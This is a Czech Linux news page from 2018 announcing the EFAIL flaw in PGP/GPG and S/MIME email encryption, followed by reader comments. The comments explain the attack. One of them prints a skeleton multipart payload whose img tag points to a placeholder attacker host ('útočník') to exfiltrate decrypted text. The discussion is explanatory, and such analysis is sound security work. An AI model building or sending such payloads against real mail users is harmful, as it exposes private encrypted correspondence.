abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 00:33 | IT novinky

    FEL ČVUT vyvinula robotickou stavebnici pro mladé programátory. Stavebnice Brian byla navržená speciálně pro potřeby populární Robosoutěže. Jde ale také o samostatný produkt, který si může koupit každý fanoušek robotiky a programování od 10 let, ideální je i pro střední školy jako výuková pomůcka. Jádro stavebnice tvoří programovatelná řídicí jednotka, kterou vyvinul tým z FEL ČVUT ve spolupráci s průmyslovými partnery. Stavebnici

    … více »
    Ladislav Hagara | Komentářů: 5
    včera 20:33 | Komunita

    Ubuntu bude pro testování nových verzí vydávat měsíční snapshoty. Dnes vyšel 1. snapshot Ubuntu 25.10 (Questing Quokka).

    Ladislav Hagara | Komentářů: 0
    včera 14:55 | Nová verze

    Společnost Netgate oznámila vydání nové verze 2.8.0 open source firewallové, routovací a VPN platformy pfSense (Wikipedie) postavené na FreeBSD. Přehled novinek v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 0
    včera 14:00 | Nová verze

    Byla vydána nová verze 6.16 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Tor Browser byl povýšen na verzi 14.5.3. Linux na verzi 6.1.140. Další změny v příslušném seznamu.

    Ladislav Hagara | Komentářů: 0
    včera 12:33 | Zajímavý článek

    Člověk odsouzený za obchod s drogami daroval letos ministerstvu spravedlnosti 468 kusů kryptoměny bitcoin, které pak resort v aukcích prodal za skoro miliardu korun. Darováním se zabývá policejní Národní centrála proti organizovanému zločinu (NCOZ). Deníku N to potvrdil přímo ministr spravedlnosti Pavel Blažek (ODS). Podle resortu bylo nicméně vše v souladu s právem.

    Ladislav Hagara | Komentářů: 13
    28.5. 20:44 | Nová verze

    Svobodný a otevřený multiplatformní editor EPUB souborů Sigil (Wikipedie, GitHub) byl vydán ve verzi 2.5.0. Stejně tak doprovodný vizuální EPUB XHTML editor PageEdit (GitHub).

    Ladislav Hagara | Komentářů: 0
    28.5. 12:22 | IT novinky

    Na základě národního atribučního procesu vláda České republiky označila Čínskou lidovou republiku za zodpovědnou za škodlivou kybernetickou kampaň proti jedné z neutajovaných komunikačních sítí Ministerstva zahraničních věcí ČR. Tato škodlivá aktivita, která trvala od roku 2022 a zasáhla instituci zařazenou na seznam české kritické infrastruktury, byla provedena kyberšpionážní skupinou APT31, veřejně spojovanou se zpravodajskou službou Ministerstvo státní bezpečnosti (MSS).

    Ladislav Hagara | Komentářů: 32
    28.5. 00:11 | Nová verze

    Google Chrome 137 byl prohlášen za stabilní. Nejnovější stabilní verze 137.0.7151.55 přináší řadu novinek z hlediska uživatelů i vývojářů. Podrobný přehled v poznámkách k vydání. Opraveno bylo 11 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře.

    Ladislav Hagara | Komentářů: 0
    27.5. 19:22 | Nová verze

    Byl vydán AlmaLinux OS 10 s kódovým názvem Purple Lion. Podrobnosti v poznámkách k vydání. Na rozdíl od Red Hat Enterprise Linuxu 10 nadále podporuje x86-64-v2.

    Ladislav Hagara | Komentářů: 0
    27.5. 15:11 | Nová verze

    Byl vydán Mozilla Firefox 139.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 139 je již k dispozici také na Flathubu a Snapcraftu.

    Ladislav Hagara | Komentářů: 10
    Jaký je váš oblíbený skriptovací jazyk?
     (55%)
     (32%)
     (7%)
     (2%)
     (0%)
     (1%)
     (3%)
    Celkem 161 hlasů
     Komentářů: 12, poslední 28.5. 18:42
    Rozcestník

    Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME

    Zítra v 9:00 budou zveřejněny informace o "vážné bezpečnostní chybě" v šifrování pošty pomocí PGP/GPG i S/MIME. EFF (Electronic Frontier Foundation) na svém blogu doporučuje okamžité zakázání automatického dešifrování zpráv nebo raději i odinstalování nástrojů pro dešifrování. Werner Koch, hlavní vývojář GnuPG, i další odborníci považují zprávu za nafouklou bublinu.

    14.5.2018 11:22 | Ladislav Hagara | Bezpečnostní upozornění


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    Slavko avatar 14.5.2018 11:46 Slavko
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Hmm, že by boli CIA, NSA a podobné dobré troj-písmenkové organizácie vážne znepokojené narastajúcim počtom šifrovaných správ?
    Conscript89 avatar 14.5.2018 12:07 Conscript89 | Brno
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Stejne jako treba FSB, ze? :)
    I can only show you the door. You're the one that has to walk through it.
    Conscript89 avatar 14.5.2018 12:13 Conscript89 | Brno
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Akorat co se tyka v tomto pripade je to co se tyce NSA, CIA spekulace, narozdil od FSB ktera dala primo "pokyn" zakazat telegram.
    I can only show you the door. You're the one that has to walk through it.
    Slavko avatar 14.5.2018 15:56 Slavko
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Síce neviem o tom, že by bol akýsi Telegram zakázaný v SR či ČR, ani že by FSB odporúčala okamžite prestať šifrovať, ale inak áno - je to špekulácia, lebo dobré troj-písmenkové organizácie nemajú odvahu urobiť to otvorene, ale získavajú prístup cez nastrčené organizácie, ako napr. súkromné kľúče prostredníctvom metrík Windows...

    Mimochodom, i dobré troj-písmenkové organizácie z USA majú podobný prístup zabezpečený ich federálnym zákonom, ale o tom sa taktne mlčí, pretože mlčanie nie je dezinformácia, že... Alebo ste nečítali veci, ktoré vyšli najavo vďaka zlému Snowdenovi?
    14.5.2018 21:12 Peter Golis | skóre: 64 | blog: Bežné záležitosti | Bratislava
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    To je ten komunista?
    Jendа avatar 14.5.2018 17:43 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Kdyby tohle objevila NSA, tak si to schová jako 0day a nebude to zveřejňovat.
    Marián Kyral avatar 15.5.2018 10:58 Marián Kyral | skóre: 29 | blog: Sem_Tam | Frýdek-Místek
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    A myslíš, že o tom ještě neví?
    14.5.2018 12:08 elenril
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Aha, takže v podstatě je to jen "HTML email je zlo a neměl by se používat", ale "security researchers" kolem toho potřebují udělat cirkus.
    14.5.2018 14:20 Lyco | skóre: 14 | blog: Lyco
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Protože už jsou k dispozici informace, tak přidávám shrnutí:

    Je to kombinace několika věcí:
    1. mailové čtečky stahují automaticky vzdálený obsah
    2. některé mailové čtečky neberou ohled na bezpečnostní interakce zašifrovaného a nezašifrovaného obsahu: můžu v plaintextu otevřít tag img, do src vložit zašifrovaný obsah (pomocí MIME multipart) a v plaintextu zase img zavřít. Voila: v logu webserveru najdu rozšifrovaný obsah.
    3. I pokud je klient rozumný, dá se udělat útok na kryptografii: používá se neautentizovaný mód CBC (nebo jeho dvojče, CFB). Útočník, pokud správně uhodne plaintext prvního bloku (a to typicky dokáže), může zkonstruovat blok který se rozšifruje na známou hodnotu. Tím vloží do plaintextu tag img a zbytek nechá normálně rozšifrovat jako výše.
    Vysvětlení Odborný článek
    Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
    Jendа avatar 14.5.2018 17:42 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    TL;DR. ELI5: Vyrobíš multipart zprávu s
    <img src="https://útočník/?m=
    ----BOUNDARY
    -----BEGIN PGP MESSAGE-----
    ...
    -----END PGP MESSAGE-----
    ----BOUNDARY
    ">
    Poštovní klient ten vnitřek rozšifruje, sestaví z toho dokument, a pokud povolíš nahrávání vzdálených obrázků (což lze zařídit třeba tím, že tuhle věc přilepíš do newsletteru z Alzy), tak se GETne ten tajný obsah. Nejspíš to selže pokud v šifrované zprávě budou uvozovky.
    14.5.2018 20:20 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Poštovní klient ten vnitřek rozšifruje
    Tak to je facepalm.
    Jendа avatar 14.5.2018 21:42 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Myslíš tím že by klient neměl rozšifrovat zprávu když je jenom částečně šifrovaná? Často totiž nemáš jinou možnost - například různé mailing listy, které přidávají patičky.
    15.5.2018 09:54 pc2005 | skóre: 38 | blog: GardenOfEdenConfiguration | liberec
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    No dovedu si představit, že by přesunul ten šifrovanej obsah do speciální oblasti a izoloval jí od okolí.
    Josef Kufner avatar 15.5.2018 10:01 Josef Kufner | skóre: 70
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    V první řadě je prasárna cpát šifrovaný text do plain-text těla mailu. Pokud se dá do samostatné multipart části, tak konference patičku přihodí jako další textovou část a nic se nerozbije (přijde multipart zpráva s dvěma těly - jedno šifrované a druhé nikoliv).
    Hello world ! Segmentation fault (core dumped)
    15.5.2018 12:56 Lyco | skóre: 14 | blog: Lyco
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    Ta chyba je na efail.de popsaná právě pro multipart maily.

    Skutečný problém je v tom, že to klient spojí a interpretuje jako celek, přestože jsou tam hranice (dané šifrováním) které nelze bezpečně překročit.
    Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
    14.5.2018 17:53 petr
    Rozbalit Rozbalit vše Re: Bezpečnostní chyba v šifrování pošty pomocí PGP/GPG i S/MIME
    at nemusite cekat https://efail.de/efail-attack-paper.pdf

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.